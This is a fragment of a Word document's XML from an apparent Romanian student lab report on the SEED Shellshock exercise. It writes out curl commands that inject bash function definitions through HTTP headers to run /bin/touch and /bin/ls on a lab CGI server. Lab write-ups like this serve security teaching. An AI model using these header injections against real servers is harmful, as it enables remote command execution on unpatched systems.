+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ne vom folosi de </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>optiunea -H</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a lui curl pentru a reusi sa cream un fisier temporar in tmp iar apoi sa listam continutul fisierului tmp printr-un alt atac </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+        </w:rPr>
+        <w:t xml:space="preserve">valoarea variabilei de mediu </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>HTTP</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>BIRLUTIU</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> va fi setata la valoarea: </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>"(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) { echo </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>salut;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">}; </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+        </w:rPr>
+        <w:t>/bin/touch /tmp/BirlutiuAtac.txt</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:i/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>comanda întreaga:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>curl -</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>H</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> "BIRLUTIU: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>() { echo salut;}; echo Content_type: text/plain; echo; /bin/touch /tmp/BirlutiuAtac.txt</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>" -v http://www.seedlab-shellshock.com/cgi-bin/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>vul</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>.cgi</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">in ruma executiei comenzii se va crea un fisier BirlutiuAtac.txt in </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>directorul</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> tmp.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="18">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>55880</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>75565</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5943600" cy="1428115"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="17" name="Image17" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="17" name="Image17" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId26"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="1428115"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Pentru a verifica continutul directorului /tmp vom rula urmatoarea comanda care va lista continutul acestului folder, tot prin injectarea unei variabile numite</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> HTTP_BIRLUTIU2 </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>curl -</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>H</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> "BIRLUTIU2: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>() { echo salut;}; echo Content_type: text/plain; echo; /bin/ls -l /tmp</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>" -v http://www.seedlab-shellshock.com/cgi-bin/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>vul</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>.cgi</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="19">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>0</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>-142875</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5943600" cy="2176780"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="18" name="Image18" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="18" name="Image18" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId27"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="2176780"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="7"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Pentru a verifica continutul folderului /tmp vom lansa un alt atac ce se va </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:rPr>
           <w:rFonts w:ascii="Inconsolata" w:hAnsi="Inconsolata"/>
+          <w:b w:val="false"/>
           <w:b w:val="false"/>
           <w:bCs w:val="false"/>
           <w:lang w:val="ro-RO"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Inconsolata" w:hAnsi="Inconsolata"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Inconsolata" w:hAnsi="Inconsolata"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Inconsolata" w:hAnsi="Inconsolata"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Inconsolata" w:hAnsi="Inconsolata"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Inconsolata" w:hAnsi="Inconsolata"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Inconsolata" w:hAnsi="Inconsolata"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Sarcina 3.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+        <w:t>D</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ștergerea fișierului din </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Inconsolata" w:hAnsi="Inconsolata"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
